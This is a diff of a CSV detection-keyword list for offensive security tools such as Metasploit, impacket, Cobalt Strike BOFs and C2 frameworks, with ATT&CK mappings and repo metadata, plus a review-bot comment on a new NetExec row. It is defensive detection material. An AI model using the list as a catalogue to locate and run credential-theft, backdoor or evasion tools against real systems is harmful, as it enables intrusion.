-"*/iam__backdoor_users_password*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
-"*/iam__bruteforce_permissions/*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
-"*/iam__privesc_scan*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/iam__backdoor_users_password*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/iam__bruteforce_permissions/*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/iam__privesc_scan*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
 "*/iax2-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/iax2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/icap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -3958,31 +3977,32 @@
 "*/icebreaker.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
 "*/IDiagnosticProfileUAC*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z"
 "*/iec-identify.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*/ielocalserver.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*/ieshell32.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*/ielocalserver.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/ieshell32.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*/iis_controller.py*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z"
 "*/IIS-Raid.git*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z"
-"*/ike-crack.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*/ike-crack.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*/IKEForce*","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs/ikeforce","1","0","N/A","N/A","3","226","73","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z"
 "*/ike-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/imap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/imap-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/imap-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/imfiver/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/imfiver/CVE-2022-0847","1","1","N/A","N/A","3","257","74","2023-02-02T02:17:30Z","2022-03-07T18:36:50Z"
-"*/impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
-"*/impacket/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
-"*/impersonate-rs*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z"
-"*/imperun * *cmd.exe /c whoami*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","72","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z"
+"*/impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*/impacket/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*/impersonate.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/impersonate-rs*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z"
+"*/imperun * *cmd.exe /c whoami*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z"
 "*/Imperva_gzip_WAF_Bypass*","offensive_tool_keyword","Imperva_gzip_WAF_Bypass","Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. etc.","T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass","1","1","N/A","N/A","2","146","29","2022-01-07T17:39:29Z","2022-01-07T17:38:33Z"
 "*/implant/callback*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z"
 "*/implant/elevate/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
 "*/implant/register_cmd*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z"
-"*/implants/*/Syscalls.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z"
-"*/ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*/implants/*/Syscalls.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*/ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
 "*/impress-remote-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*/inceptor.git*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
-"*/inceptor.git*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
-"*/infection_monkey/*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z"
+"*/inceptor.git*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*/inceptor.git*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*/infection_monkey/*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
 "*/Infoga*","offensive_tool_keyword","Infoga","Email Information Gathering.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/m4ll0k/Infoga","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
 "*/informix-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/informix-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
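Review bot: The one genuinely new row in this hunk, `*/impersonate.py*` for NetExec, keys on a bare file name that is not specific to the tool, so with metadata_enable_endpoint_detection set to "1" it will likely match unrelated Python projects that ship a file of the same name. Its metadata_comment is `"N/A"`; I would record the caveat there, for example `"generic file name - high risk of false positives"`, as the file already does on other noisy rows, or tighten the keyword with the tool's own directory prefix. The row also sets metadata_enable_proxy_detection to `"0"` while the neighbouring path-style keyword `*/impersonate-rs*` sets it to `"1"`; that may be intentional, but it is worth confirming. The remaining changed rows only refresh the star, fork and updated-at columns.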
@@ -3991,58 +4011,60 @@ "*/Inject/Dll/LoadDll*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/Inject/PE/*.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/Inject/ShellCode/*.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*/injectAmsiBypass/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 
- T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","362","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" +"*/injectAmsiBypass/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","363","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" "*/inject-assembly/*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 
- T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" 